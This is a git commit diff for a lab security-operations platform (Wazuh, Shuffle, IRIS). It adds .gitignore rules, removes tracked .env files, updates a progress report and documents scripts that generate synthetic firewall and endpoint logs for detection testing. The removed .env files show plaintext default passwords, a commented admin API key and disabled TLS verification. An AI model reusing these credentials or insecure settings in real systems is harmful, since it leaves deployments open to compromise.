3 недели назад
Родитель
Commit
0de071e7c9

+ 4 - 4
.gitignore

@@ -27,10 +27,10 @@ node_modules/
27 27
 **/node_modules/
28 28
 
29 29
 # Env/secrets
30
-# .env
31
-# .env.*
32
-# !.env.example
33
-# !**/.env.example
30
+.env
31
+.env.*
32
+!.env.example
33
+!**/.env.example
34 34
 # *.pem
35 35
 # *.key
36 36
 # *.crt

+ 0 - 122
Shuffle/.env

@@ -1,122 +0,0 @@
1
-# Default execution environment for workers
2
-ENVIRONMENT_NAME=Shuffle
3
-
4
-# Sanitize liquid.py input
5
-LIQUID_SANITIZE_INPUT=true
6
-
7
-
8
-# Remote github config for first load
9
-SHUFFLE_DOWNLOAD_WORKFLOW_LOCATION=
10
-SHUFFLE_DOWNLOAD_WORKFLOW_USERNAME=
11
-SHUFFLE_DOWNLOAD_WORKFLOW_PASSWORD=
12
-SHUFFLE_DOWNLOAD_WORKFLOW_BRANCH=
13
-
14
-SHUFFLE_APP_DOWNLOAD_LOCATION=https://github.com/shuffle/python-apps
15
-SHUFFLE_DOWNLOAD_AUTH_USERNAME=
16
-SHUFFLE_DOWNLOAD_AUTH_PASSWORD=
17
-SHUFFLE_DOWNLOAD_AUTH_BRANCH=
18
-SHUFFLE_APP_FORCE_UPDATE=false
19
-
20
-# User config for first load. Username & PW: min length 3
21
-SHUFFLE_DEFAULT_USERNAME=
22
-SHUFFLE_DEFAULT_PASSWORD=
23
-SHUFFLE_DEFAULT_APIKEY=
24
-
25
-# Local location of your app directory. Can't use ~/
26
-# Files will get better at some point. Right now: local saving.
27
-SHUFFLE_APP_HOTLOAD_FOLDER=./shuffle-apps
28
-SHUFFLE_APP_HOTLOAD_LOCATION=./shuffle-apps
29
-SHUFFLE_FILE_LOCATION=./shuffle-files
30
-
31
-# Encryption modifier. This HAS to be set to encrypt any authentication being used in Shuffle. This is put together with other relevant values to ensure multiple parts are needed to decrypt.
32
-# If this key is lost or changed, you will have to reauthenticate all apps.
33
-SHUFFLE_ENCRYPTION_MODIFIER=
34
-
35
-# Other configs
36
-BASE_URL=http://shuffle-backend:5001
37
-SSO_REDIRECT_URL=http://localhost:3001
38
-BACKEND_HOSTNAME=shuffle-backend
39
-BACKEND_PORT=5001
40
-FRONTEND_PORT=3001
41
-FRONTEND_PORT_HTTPS=3443
42
-AUTH_FOR_ORBORUS=
43
-
44
-# CHANGE THIS IF YOU WANT GOOD LOCAL EXECUTIONS:
45
-OUTER_HOSTNAME=shuffle-backend
46
-DB_LOCATION=./shuffle-database
47
-DOCKER_API_VERSION=1.44
48
-
49
-# Orborus/Proxy configurations
50
-HTTP_PROXY=
51
-HTTPS_PROXY=
52
-SHUFFLE_PASS_WORKER_PROXY=TRUE
53
-SHUFFLE_PASS_APP_PROXY=TRUE
54
-SHUFFLE_INTERNAL_HTTP_PROXY=noproxy
55
-SHUFFLE_INTERNAL_HTTPS_PROXY=noproxy
56
-# Timezone-handler in Orborus, Worker and Apps
57
-TZ=Europe/Amsterdam
58
-# Used to FIND the containername. cgroup v2: issue 501
59
-ORBORUS_CONTAINER_NAME=
60
-# Used for setting up a startup delay for Orborus
61
-SHUFFLE_ORBORUS_STARTUP_DELAY=
62
-SHUFFLE_SKIPSSL_VERIFY=true
63
-# Used for controlling if the environment should run in kubernetes or not
64
-IS_KUBERNETES=false
65
-
66
-#SHUFFLE_BASE_IMAGE_NAME=shuffle
67
-#SHUFFLE_BASE_IMAGE_REGISTRY=ghcr.io
68
-SHUFFLE_BASE_IMAGE_REPOSITORY=frikky
69
-#SHUFFLE_BASE_IMAGE_TAG_SUFFIX="-1.4.0"
70
-
71
-# For environments using their own docker registry
72
-# where they don't want to update http, subflow and shuffle tools again
73
-SHUFFLE_USE_GCHR_OVERRIDE_FOR_AUTODEPLOY=true
74
-
75
-# The eth0 interface inside a container corresponds
76
-# to the virtual Ethernet interface that connects
77
-# the container to the docker0
78
-SHUFFLE_SWARM_BRIDGE_DEFAULT_INTERFACE=eth0
79
-# 1500 by default
80
-SHUFFLE_SWARM_BRIDGE_DEFAULT_MTU=1500
81
-
82
-# Used for auto-cleanup of containers. REALLY important at scale. Set to false to see all container info.
83
-SHUFFLE_MEMCACHED=
84
-SHUFFLE_CONTAINER_AUTO_CLEANUP=true
85
-# The amount of concurrent executions Orborus can handle. This is a soft limit, but it's recommended to keep it low.
86
-SHUFFLE_ORBORUS_EXECUTION_CONCURRENCY=5
87
-SHUFFLE_HEALTHCHECK_DISABLED=false
88
-SHUFFLE_ELASTIC=true
89
-SHUFFLE_LOGS_DISABLED=true
90
-SHUFFLE_CHAT_DISABLED=false
91
-SHUFFLE_DISABLE_RERUN_AND_ABORT=false
92
-SHUFFLE_RERUN_SCHEDULE=300
93
-# Definition in case Worker & Orborus is talking to the wrong server
94
-SHUFFLE_WORKER_SERVER_URL=
95
-# Definition in case Orborus is pulling too often/not often enough
96
-SHUFFLE_ORBORUS_PULL_TIME=
97
-# Max recursion depth for subflows
98
-SHUFFLE_MAX_EXECUTION_DEPTH=
99
-# Amount of app replicas
100
-SHUFFLE_APP_REPLICAS=3
101
-
102
-# DATABASE CONFIGURATIONS
103
-DATASTORE_EMULATOR_HOST=shuffle-database:8000
104
-SHUFFLE_OPENSEARCH_URL=https://shuffle-opensearch:9200
105
-SHUFFLE_OPENSEARCH_CERTIFICATE_FILE=
106
-SHUFFLE_OPENSEARCH_APIKEY=
107
-SHUFFLE_OPENSEARCH_CLOUDID=
108
-SHUFFLE_OPENSEARCH_PROXY=
109
-SHUFFLE_OPENSEARCH_INDEX_PREFIX=
110
-SHUFFLE_OPENSEARCH_SKIPSSL_VERIFY=true
111
-SHUFFLE_OPENSEARCH_USERNAME="admin"
112
-SHUFFLE_OPENSEARCH_PASSWORD="StrongShufflePassword321!" # In use for the first time setup of OpenSearch + backend of Shuffle
113
-OPENSEARCH_INITIAL_ADMIN_PASSWORD="StrongShufflePassword321!" # In use for the first time setup of OpenSearch
114
-SHUFFLE_SKIP_PIPELINES=true
115
-SHUFFLE_PIPELINE_ENABLED=false
116
-
117
-#Tenzir related
118
-SHUFFLE_TENZIR_URL=
119
-
120
-SHUFFLE_PROTECTED_CLEANUP_DISABLED=true
121
-
122
-DEBUG_MODE=false

+ 8 - 0
compose-overrides/soc-integrator.yml

@@ -41,6 +41,8 @@ services:
41 41
         condition: service_healthy
42 42
     networks:
43 43
       - soc_shared
44
+      - shuffle_default
45
+      - shuffle_swarm_executions
44 46
 
45 47
 volumes:
46 48
   soc-integrator-db-data:
@@ -49,3 +51,9 @@ networks:
49 51
   soc_shared:
50 52
     external: true
51 53
     name: ${SOC_SHARED_NETWORK:-soc_shared}
54
+  shuffle_default:
55
+    external: true
56
+    name: shuffle_shuffle
57
+  shuffle_swarm_executions:
58
+    external: true
59
+    name: shuffle_swarm_executions

+ 0 - 103
iris-web/.env

@@ -1,103 +0,0 @@
1
-# -- COMMON
2
-LOG_LEVEL=info
3
-
4
-# -- NGINX
5
-NGINX_IMAGE_NAME=ghcr.io/dfir-iris/iriswebapp_nginx
6
-NGINX_IMAGE_TAG=latest
7
-
8
-SERVER_NAME=iris.app.dev
9
-KEY_FILENAME=iris_dev_key.pem
10
-CERT_FILENAME=iris_dev_cert.pem
11
-
12
-# -- DATABASE
13
-DB_IMAGE_NAME=ghcr.io/dfir-iris/iriswebapp_db
14
-DB_IMAGE_TAG=latest
15
-
16
-POSTGRES_USER=postgres
17
-POSTGRES_PASSWORD=__MUST_BE_CHANGED__
18
-POSTGRES_ADMIN_USER=raptor
19
-POSTGRES_ADMIN_PASSWORD=__MUST_BE_CHANGED__
20
-POSTGRES_DB=iris_db
21
-
22
-POSTGRES_SERVER=db
23
-POSTGRES_PORT=5432
24
-
25
-# -- IRIS
26
-APP_IMAGE_NAME=ghcr.io/dfir-iris/iriswebapp_app
27
-APP_IMAGE_TAG=latest
28
-
29
-DOCKERIZED=1
30
-
31
-IRIS_SECRET_KEY=AVerySuperSecretKey-SoNotThisOne
32
-IRIS_SECURITY_PASSWORD_SALT=ARandomSalt-NotThisOneEither
33
-IRIS_UPSTREAM_SERVER=app
34
-IRIS_UPSTREAM_PORT=8000
35
-
36
-IRIS_FRONTEND_SERVER=frontend
37
-IRIS_FRONTEND_PORT=5173
38
-
39
-IRIS_SVELTEKIT_FRONTEND_DIR=../iris-frontend
40
-
41
-
42
-# -- WORKER
43
-CELERY_BROKER=amqp://rabbitmq
44
-
45
-# -- AUTH
46
-IRIS_AUTHENTICATION_TYPE=local
47
-## optional
48
-IRIS_ADM_PASSWORD=MySuperAdminPassword!
49
-#IRIS_ADM_API_KEY=B8BA5D730210B50F41C06941582D7965D57319D5685440587F98DFDC45A01594
50
-#IRIS_ADM_EMAIL=admin@localhost
51
-IRIS_ADM_USERNAME=administrator
52
-# requests the just-in-time creation of users with ldap authentification (see https://github.com/dfir-iris/iris-web/issues/203)
53
-#IRIS_AUTHENTICATION_CREATE_USER_IF_NOT_EXIST=True
54
-# the group to which newly created users are initially added, default value is Analysts
55
-#IRIS_NEW_USERS_DEFAULT_GROUP=
56
-
57
-# -- FOR LDAP AUTHENTICATION
58
-#IRIS_AUTHENTICATION_TYPE=ldap
59
-#LDAP_SERVER=127.0.0.1
60
-#LDAP_AUTHENTICATION_TYPE=SIMPLE
61
-#LDAP_PORT=3890
62
-#LDAP_USER_PREFIX=uid=
63
-#LDAP_USER_SUFFIX=ou=people,dc=example,dc=com
64
-#LDAP_USE_SSL=False
65
-# base DN in which to search for users
66
-#LDAP_SEARCH_DN=ou=users,dc=example,dc=org
67
-# unique identifier to search the user
68
-#LDAP_ATTRIBUTE_IDENTIFIER=cn
69
-# name of the attribute to retrieve the user's display name
70
-#LDAP_ATTRIBUTE_DISPLAY_NAME=displayName
71
-# name of the attribute to retrieve the user's email address
72
-#LDAP_ATTRIBUTE_MAIL=mail
73
-#LDAP_VALIDATE_CERTIFICATE=True
74
-#LDAP_TLS_VERSION=1.2
75
-#LDAP_SERVER_CERTIFICATE=
76
-#LDAP_PRIVATE_KEY=
77
-#LDAP_PRIVATE_KEY_PASSWORD=
78
-
79
-# -- FOR OIDC AUTHENTICATION
80
-# IRIS_AUTHENTICATION_TYPE=oidc
81
-# OIDC_ISSUER_URL=
82
-# OIDC_CLIENT_ID=
83
-# OIDC_CLIENT_SECRET=
84
-# endpoints only required if provider doesn't support metadata discovery
85
-# OIDC_AUTH_ENDPOINT=
86
-# OIDC_TOKEN_ENDPOINT=
87
-# optional to include logout from oidc provider
88
-# OIDC_END_SESSION_ENDPOINT=
89
-# OIDC redirect URL for your IDP: https://<IRIS_SERVER_NAME>/oidc-authorize
90
-
91
-# -- LISTENING PORT
92
-INTERFACE_HTTPS_PORT=443
93
-
94
-# -- FOR OIDC AUTHENTICATION
95
-#IRIS_AUTHENTICATION_TYPE=oidc
96
-#OIDC_ISSUER_URL=
97
-#OIDC_CLIENT_ID=
98
-#OIDC_CLIENT_SECRET=
99
-# endpoints only required if provider doesn't support metadata discovery
100
-#OIDC_AUTH_ENDPOINT=
101
-#OIDC_TOKEN_ENDPOINT=
102
-# optional to include logout from oidc provider
103
-#OIDC_END_SESSION_ENDPOINT=

+ 298 - 0
progress-update.md

@@ -177,3 +177,301 @@ Target outputs:
177 177
 - Tuned policy thresholds for customer environment
178 178
 - Signed-off incident lifecycle flow:
179 179
   Wazuh event -> soc-integrator decision -> IRIS case -> PagerDuty Stub escalation
180
+
181
+---
182
+
183
+Date: February 26, 2026
184
+Project: FoodProject SOC Platform (Wazuh + Shuffle + IRIS-web + SOC Integrator)
185
+
186
+## Incremental Progress Since February 13, 2026
187
+
188
+### 1) IOC Enrichment and Evaluation
189
+
190
+- Added IOC APIs in `soc-integrator`:
191
+  - `POST /ioc/enrich`
192
+  - `POST /ioc/evaluate`
193
+  - `GET /ioc/history`
194
+  - `POST /ioc/upload-file`
195
+  - `POST /ioc/evaluate-file`
196
+  - `GET /ioc/analysis/{analysis_id}`
197
+- Integrated VirusTotal adapter for domain/hash/file intelligence and analysis lookups.
198
+- Integrated AbuseIPDB adapter for IP reputation checks.
199
+- Added IOC trace persistence (`ioc_trace`) and repository methods for audit/history.
200
+
201
+### 2) IRIS Integration Enhancements
202
+
203
+- Added IRIS ticket APIs in `soc-integrator`:
204
+  - `POST /iris/tickets`
205
+  - `GET /iris/tickets`
206
+- Updated IRIS API key in environment and verified ticket creation path via API.
207
+- Added demo data seeding script:
208
+  - `scripts/seed-iris-demo-data.sh`
209
+
210
+### 3) Shuffle Workflow Automation
211
+
212
+- Created and updated sample Shuffle workflow assets for webhook-driven IRIS ticket creation:
213
+  - `shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.json`
214
+  - `shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.md`
215
+- Added workflow update helper script:
216
+  - `scripts/update-shuffle-workflow-from-template.sh`
217
+- Updated target workflow (`07ecad05-ff68-41cb-888d-96d1a8e8db4b`) with:
218
+  - webhook trigger
219
+  - HTTP action (`http 1.4.0`) to call `soc-integrator` ticket API
220
+  - tested webhook execution path to successful completion
221
+
222
+### 4) Networking and Runtime Fixes
223
+
224
+- Resolved Shuffle action DNS failure to `soc-integrator` by attaching `soc-integrator` service to Shuffle execution network(s) in:
225
+  - `compose-overrides/soc-integrator.yml`
226
+- Verified connectivity from Shuffle execution context to:
227
+  - `http://soc-integrator:8080/health`
228
+
229
+### 5) Security and Repository Hygiene
230
+
231
+- Added `.env` and `.env.*` to root `.gitignore` (kept `.env.example` tracked).
232
+- Removed tracked env files from git cache to prevent secret leakage.
233
+- Updated operational API keys in `soc-integrator/.env` for Shuffle, IRIS, VirusTotal, and AbuseIPDB.
234
+
235
+### 6) Current Status (Lab)
236
+
237
+- `soc-integrator` health endpoint: reachable.
238
+- IOC enrich/evaluate flows: operational for domain/hash and file submission paths.
239
+- Shuffle webhook-to-IRIS automation: operational after network fix.
240
+- Core stack components remain available for continued UAT and tuning.
241
+
242
+### 7) Simulation Logs Workstream
243
+
244
+#### Completed
245
+
246
+- Added FortiGate simulation coverage for multiple models:
247
+  - 40F
248
+  - 60F
249
+  - 80F
250
+  - 501E
251
+- Added endpoint agent simulation coverage for:
252
+  - Windows clients
253
+  - macOS clients
254
+  - Linux clients
255
+- Added continuous run mode (`--forever`) to simulation scripts for long-running lab traffic generation.
256
+- Extended script set to support realistic event streams for Wazuh ingestion and rule validation.
257
+
258
+#### Operational scripts
259
+
260
+- `scripts/send-wazuh-test-events.sh`
261
+- `scripts/send-wazuh-endpoint-agent-test-events.sh`
262
+- additional simulation scripts under `scripts/` for firewall and endpoint scenarios with continuous mode enabled
263
+
264
+#### Detection alignment status
265
+
266
+- Simulation work has been aligned to the detection objectives documented in:
267
+  - `Security Detection & Threat Intelligence Enhancement Proposal-2.md`
268
+- Proposal use-case mapping explicitly covered in simulation:
269
+  - **A1. DNS / Firewall (IOC)**:
270
+    - DNS network communication to malicious domain
271
+    - DNS/Firewall malicious domain IOC detection events
272
+  - **A2. FortiGate IPS/IDS & Firewall**:
273
+    - allowed RDP from public IP
274
+    - admin password change
275
+    - create/add admin account
276
+    - disable email notification
277
+    - config download
278
+    - multiple critical/high IDS alerts
279
+    - port scanning (public/private source variants)
280
+    - IOC detection and communication to malicious IP
281
+  - **A3. FortiGate VPN**:
282
+    - authentication success from guest account
283
+    - authentication success from multiple countries
284
+    - brute-force success pattern
285
+    - multiple fail patterns (many accounts from one source)
286
+    - authentication success from outside Thailand
287
+  - **A4. Windows / Active Directory**:
288
+    - privileged/service account authentication failures
289
+    - password spray and multi-source fail patterns
290
+    - success from public IP / guest account
291
+    - pass-the-hash style success indicators
292
+    - account/group privilege change and account lifecycle events (create/re-enable)
293
+    - AD enumeration behavior indicators
294
+- Endpoint client simulations were added to complement proposal scope for heterogeneous environments:
295
+  - Windows agent events
296
+  - macOS agent events
297
+  - Linux agent events
298
+- Current use is suitable for pipeline and workflow validation (ingest -> detect -> automate -> case creation).
299
+- Remaining work is focused on fine-grained scenario calibration:
300
+  - event frequency tuning
301
+  - field/value realism per source
302
+  - expected alert volume by use case for cleaner UAT evidence
303
+
304
+### 8) API Request/Response Samples
305
+
306
+#### IOC Enrich
307
+
308
+Request:
309
+
310
+```bash
311
+curl -sS -X POST http://localhost:8088/ioc/enrich \
312
+  -H 'Content-Type: application/json' \
313
+  -d '{
314
+    "ioc_type": "domain",
315
+    "ioc_value": "google.com",
316
+    "sources": ["virustotal"]
317
+  }'
318
+```
319
+
320
+Sample response:
321
+
322
+```json
323
+{
324
+  "success": true,
325
+  "ioc_type": "domain",
326
+  "ioc_value": "google.com",
327
+  "enrichment": {
328
+    "virustotal": {
329
+      "reputation": 120,
330
+      "last_analysis_stats": {
331
+        "malicious": 0,
332
+        "suspicious": 0,
333
+        "harmless": 90
334
+      }
335
+    }
336
+  }
337
+}
338
+```
339
+
340
+#### IOC Evaluate
341
+
342
+Request:
343
+
344
+```bash
345
+curl -sS -X POST http://localhost:8088/ioc/evaluate \
346
+  -H 'Content-Type: application/json' \
347
+  -d '{
348
+    "ioc_type": "hash",
349
+    "ioc_value": "44d88612fea8a8f36de82e1278abb02f",
350
+    "sources": ["virustotal"]
351
+  }'
352
+```
353
+
354
+Sample response:
355
+
356
+```json
357
+{
358
+  "success": true,
359
+  "matched": true,
360
+  "severity": "high",
361
+  "reason": "VirusTotal marked IOC as malicious",
362
+  "ioc_type": "hash",
363
+  "ioc_value": "44d88612fea8a8f36de82e1278abb02f"
364
+}
365
+```
366
+
367
+#### Create IRIS Ticket (via soc-integrator)
368
+
369
+Request:
370
+
371
+```bash
372
+curl -sS -X POST http://localhost:8088/iris/tickets \
373
+  -H 'Content-Type: application/json' \
374
+  -d '{
375
+    "title": "Suspicious domain detected",
376
+    "description": "Automated ticket from IOC evaluation pipeline",
377
+    "severity": "medium",
378
+    "source_ref": "shuffle-webhook-demo"
379
+  }'
380
+```
381
+
382
+Sample response:
383
+
384
+```json
385
+{
386
+  "success": true,
387
+  "ticket_id": 53,
388
+  "case_id": 53,
389
+  "status": "open"
390
+}
391
+```
392
+
393
+### 9) Why IOC Was Added to SOC Integrator
394
+
395
+- To centralize threat-intelligence logic in one API layer instead of duplicating enrichment/evaluation rules across Shuffle workflows and other services.
396
+- To provide a consistent decision contract (`enrich` for context, `evaluate` for action/verdict) that downstream automation can trust.
397
+- To improve traceability by storing IOC checks and decisions in `soc-integrator` history for audit, tuning, and UAT evidence.
398
+- To simplify integrations with multiple intelligence providers (VirusTotal, AbuseIPDB, and future sources) behind one internal interface.
399
+- To reduce workflow complexity in Shuffle so playbooks focus on orchestration (branching, ticketing, notifications) while IOC decisioning stays in backend logic.
400
+
401
+### 10) Sequence Diagram (MermaidJS)
402
+
403
+```mermaid
404
+sequenceDiagram
405
+    autonumber
406
+    participant Sim as Log Simulator
407
+    participant Wz as Wazuh
408
+    participant Sh as Shuffle
409
+    participant SI as soc-integrator
410
+    participant VT as VirusTotal/AbuseIPDB
411
+    participant IR as IRIS
412
+
413
+    Sim->>Wz: Send FortiGate/Endpoint simulated logs
414
+    Wz->>Wz: Parse + correlate + trigger alert rule
415
+    Wz->>Sh: Trigger workflow (webhook/API)
416
+    Sh->>SI: POST /ioc/enrich (ioc_type, ioc_value)
417
+    SI->>VT: Query IOC intelligence
418
+    VT-->>SI: Enrichment data
419
+    SI-->>Sh: Enrichment result
420
+    Sh->>SI: POST /ioc/evaluate (ioc + enrichment context)
421
+    SI->>SI: Apply decision logic + write ioc_trace
422
+    SI-->>Sh: matched/severity/reason
423
+    alt matched == true
424
+        Sh->>SI: POST /iris/tickets
425
+        SI->>IR: Create ticket/case
426
+        IR-->>SI: ticket_id/case_id
427
+        SI-->>Sh: Ticket creation success
428
+    else matched == false
429
+        Sh-->>Sh: End workflow without ticket
430
+    end
431
+```
432
+
433
+### 11) SOC Integrator API Inventory
434
+
435
+| Group | Method | Endpoint | Notes |
436
+|---|---|---|---|
437
+| Core | GET | `/health` | Service health and target configuration |
438
+| Core | POST | `/ingest/wazuh-alert` | Normalize inbound Wazuh alert payload |
439
+| Core | POST | `/action/create-incident` | Create PagerDuty incident |
440
+| Core | POST | `/action/trigger-shuffle` | Trigger Shuffle workflow execution |
441
+| Core | POST | `/action/create-iris-case` | Create IRIS case (legacy action endpoint) |
442
+| IRIS | POST | `/iris/tickets` | Create IRIS ticket/case via soc-integrator |
443
+| IRIS | GET | `/iris/tickets` | List/query IRIS tickets/cases |
444
+| IOC | POST | `/ioc/enrich` | IOC enrichment from configured intel sources |
445
+| IOC | POST | `/ioc/evaluate` | IOC decisioning/verdict |
446
+| IOC | POST | `/ioc/upload-file` | Upload file to IOC backend (VirusTotal flow) |
447
+| IOC | GET | `/ioc/analysis/{analysis_id}` | Retrieve IOC analysis status/result |
448
+| IOC | POST | `/ioc/evaluate-file` | Evaluate file indicator or uploaded sample |
449
+| IOC | GET | `/ioc/history` | Retrieve stored IOC trace history |
450
+| Shuffle | GET | `/shuffle/health` | Shuffle service reachability check |
451
+| Shuffle | GET | `/shuffle/auth-test` | Validate Shuffle API key access |
452
+| Shuffle | POST | `/shuffle/login` | Login against Shuffle API |
453
+| Shuffle | POST | `/shuffle/generate-apikey` | Generate Shuffle API key from credentials |
454
+| Shuffle | GET | `/shuffle/workflows` | List workflows |
455
+| Shuffle | GET | `/shuffle/workflows/{workflow_id}` | Get workflow detail |
456
+| Shuffle | POST | `/shuffle/workflows/{workflow_id}/execute` | Execute specific workflow |
457
+| Shuffle | GET | `/shuffle/apps` | List installed/available Shuffle apps |
458
+| Shuffle | POST | `/shuffle/proxy` | Generic proxy request to Shuffle API |
459
+| Wazuh | GET | `/sync/wazuh-version` | Fetch Wazuh version information |
460
+| Wazuh | GET | `/wazuh/auth-test` | Validate Wazuh API authentication |
461
+| Wazuh | GET | `/wazuh/manager-info` | Manager information |
462
+| Wazuh | GET | `/wazuh/agents` | List Wazuh agents |
463
+| Wazuh | GET | `/wazuh/alerts` | Query recent Wazuh alerts |
464
+| Wazuh | GET | `/wazuh/manager-logs` | Read manager logs |
465
+| Wazuh | POST | `/wazuh/sync-to-mvp` | Sync Wazuh alerts into MVP pipeline |
466
+| Wazuh | GET | `/wazuh/auto-sync/status` | Auto-sync loop status |
467
+| MVP | POST | `/mvp/incidents/ingest` | Ingest incident into MVP flow |
468
+| MVP | POST | `/mvp/ioc/evaluate` | Evaluate IOC under MVP policy |
469
+| MVP | POST | `/mvp/vpn/evaluate` | Evaluate VPN event under MVP policy |
470
+| MVP | GET | `/mvp/config/policies` | Read MVP policy configuration |
471
+| MVP | PUT | `/mvp/config/policies` | Update MVP policy configuration |
472
+| MVP | GET | `/mvp/health/dependencies` | Dependency health snapshot |
473
+
474
+Additional FastAPI-generated endpoints:
475
+
476
+- `GET /docs`
477
+- `GET /openapi.json`

BIN
progress-update.pdf


+ 156 - 0
scripts/README.md

@@ -8,6 +8,9 @@ Use this to inject synthetic SOC events via syslog UDP into Wazuh manager.
8 8
 scripts/send-wazuh-test-events.sh [scenario] [count] [delay_seconds]
9 9
 ```
10 10
 
11
+Optional flag:
12
+- `--forever` (ignore `count` and run continuously until Ctrl+C)
13
+
11 14
 Scenarios:
12 15
 - `ioc_dns`
13 16
 - `ioc_ips`
@@ -21,6 +24,7 @@ Examples:
21 24
 scripts/send-wazuh-test-events.sh all
22 25
 scripts/send-wazuh-test-events.sh vpn_outside_th 5 0.2
23 26
 WAZUH_SYSLOG_HOST=127.0.0.1 WAZUH_SYSLOG_PORT=514 scripts/send-wazuh-test-events.sh ioc_ips
27
+scripts/send-wazuh-test-events.sh all 1 2 --forever
24 28
 ```
25 29
 
26 30
 Environment overrides:
@@ -42,6 +46,9 @@ Use this to inject Cisco-style syslog events (ASA/IOS) into Wazuh manager.
42 46
 scripts/send-wazuh-cisco-test-events.sh [scenario] [count] [delay_seconds]
43 47
 ```
44 48
 
49
+Optional flag:
50
+- `--forever` (ignore `count` and run continuously until Ctrl+C)
51
+
45 52
 Scenarios:
46 53
 - `asa_acl_deny`
47 54
 - `asa_vpn_auth_fail`
@@ -55,6 +62,7 @@ Examples:
55 62
 scripts/send-wazuh-cisco-test-events.sh all
56 63
 scripts/send-wazuh-cisco-test-events.sh asa_acl_deny 5 0.2
57 64
 CISCO_DEVICE_HOST=edge-fw-01 scripts/send-wazuh-cisco-test-events.sh ios_login_fail
65
+scripts/send-wazuh-cisco-test-events.sh all 1 2 --forever
58 66
 ```
59 67
 
60 68
 Environment overrides:
@@ -66,6 +74,154 @@ Environment overrides:
66 74
 - `CISCO_VPN_USER`
67 75
 - `CISCO_ADMIN_USER`
68 76
 
77
+## Send FortiGate firewall test events
78
+
79
+Use this to inject FortiGate-style syslog events (models `501E`, `80F`, `60F`, `40F`) into Wazuh manager.
80
+
81
+```bash
82
+scripts/send-wazuh-fortigate-test-events.sh [model] [count] [delay_seconds]
83
+```
84
+
85
+Optional flag:
86
+- `--forever` (ignore `count` and run continuously until Ctrl+C)
87
+
88
+Models:
89
+- `501E`
90
+- `80F`
91
+- `60F`
92
+- `40F`
93
+- `all`
94
+
95
+Examples:
96
+
97
+```bash
98
+scripts/send-wazuh-fortigate-test-events.sh all
99
+scripts/send-wazuh-fortigate-test-events.sh 80F 5 0.2
100
+WAZUH_SYSLOG_HOST=127.0.0.1 WAZUH_SYSLOG_PORT=514 scripts/send-wazuh-fortigate-test-events.sh 60F
101
+scripts/send-wazuh-fortigate-test-events.sh all 1 2 --forever
102
+```
103
+
104
+Environment overrides:
105
+- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
106
+- `WAZUH_SYSLOG_PORT` (default `514`)
107
+- `FGT_SRC_IP`
108
+- `FGT_DST_IP`
109
+- `FGT_DOMAIN`
110
+- `FGT_USER`
111
+
112
+## Run continuous FortiGate simulation
113
+
114
+Use this to generate ongoing FortiGate-like traffic and security events for Wazuh testing.
115
+
116
+```bash
117
+scripts/send-wazuh-fortigate-continuous.sh [profile] [models] [base_delay_seconds]
118
+```
119
+
120
+Profiles:
121
+- `normal` (mostly allowed traffic, occasional admin/vpn/webfilter)
122
+- `incident` (higher IPS/webfilter/vpn anomalies)
123
+- `mixed` (balanced baseline + anomalies)
124
+
125
+Models:
126
+- `501E`
127
+- `80F`
128
+- `60F`
129
+- `40F`
130
+- `all`
131
+
132
+Examples:
133
+
134
+```bash
135
+scripts/send-wazuh-fortigate-continuous.sh mixed all 0.8
136
+scripts/send-wazuh-fortigate-continuous.sh incident 80F 0.3
137
+SIM_MAX_EVENTS=200 scripts/send-wazuh-fortigate-continuous.sh normal 501E 1.0
138
+```
139
+
140
+Environment overrides:
141
+- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
142
+- `WAZUH_SYSLOG_PORT` (default `514`)
143
+- `SIM_MAX_EVENTS` (default `0`, which means run forever)
144
+- `SIM_SRC_PREFIX` (default `10.10.20`)
145
+- `SIM_VPN_USER`
146
+- `SIM_ADMIN_USER`
147
+
148
+## Simulate all required logs from proposal
149
+
150
+Use this to generate synthetic logs for all use cases listed in:
151
+`Security Detection & Threat Intelligence Enhancement Proposal-2.md` Appendix A (A1-A4).
152
+
153
+```bash
154
+scripts/send-wazuh-proposal-required-events.sh [selector] [count] [delay_seconds]
155
+```
156
+
157
+Optional flag:
158
+- `--forever` (ignore `count` and run continuously until Ctrl+C)
159
+
160
+Selectors:
161
+- `all` (all Appendix A use cases)
162
+- `a1`, `a2`, `a3`, `a4` (by section)
163
+- specific use case id, e.g. `A2-01`, `A3-05`, `A4-24`
164
+
165
+Examples:
166
+
167
+```bash
168
+scripts/send-wazuh-proposal-required-events.sh all 1
169
+scripts/send-wazuh-proposal-required-events.sh a3 3 0.5
170
+scripts/send-wazuh-proposal-required-events.sh A3-05 1
171
+DRY_RUN=1 scripts/send-wazuh-proposal-required-events.sh all 1
172
+scripts/send-wazuh-proposal-required-events.sh a2 1 2 --forever
173
+```
174
+
175
+Environment overrides:
176
+- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
177
+- `WAZUH_SYSLOG_PORT` (default `514`)
178
+- `EVENT_DELAY` (default `0.05`)
179
+- `DRY_RUN` (default `0`, set `1` to print only)
180
+- `FGT_DEVNAME`, `FGT_DEVID`
181
+- `WIN_HOST`, `DNS_HOST`
182
+- `SIM_VPN_USER`
183
+
184
+## Simulate endpoint client-agent logs (Windows / macOS / Linux)
185
+
186
+Use this to inject realistic endpoint telemetry for client agents into Wazuh.
187
+
188
+```bash
189
+scripts/send-wazuh-endpoint-agent-test-events.sh [platform] [scenario] [count] [delay_seconds]
190
+```
191
+
192
+Optional flag:
193
+- `--forever` (ignore `count` and run continuously until Ctrl+C)
194
+
195
+Platforms:
196
+- `windows`
197
+- `mac`
198
+- `linux`
199
+- `all`
200
+
201
+Scenarios:
202
+- `auth`
203
+- `process`
204
+- `persistence`
205
+- `privilege`
206
+- `malware`
207
+- `all`
208
+
209
+Examples:
210
+
211
+```bash
212
+scripts/send-wazuh-endpoint-agent-test-events.sh all all 1 0.2
213
+scripts/send-wazuh-endpoint-agent-test-events.sh windows process 10 0.1
214
+DRY_RUN=1 scripts/send-wazuh-endpoint-agent-test-events.sh linux all 1 0
215
+scripts/send-wazuh-endpoint-agent-test-events.sh all auth 1 2 --forever
216
+```
217
+
218
+Environment overrides:
219
+- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
220
+- `WAZUH_SYSLOG_PORT` (default `514`)
221
+- `DRY_RUN` (default `0`)
222
+- `WIN_HOST`, `MAC_HOST`, `LINUX_HOST`
223
+- `SIM_USER`
224
+
69 225
 ## Shuffle sample workflow helpers
70 226
 
71 227
 Sample playbook design for Shuffle:

+ 138 - 0
scripts/seed-iris-demo-data.sh

@@ -0,0 +1,138 @@
1
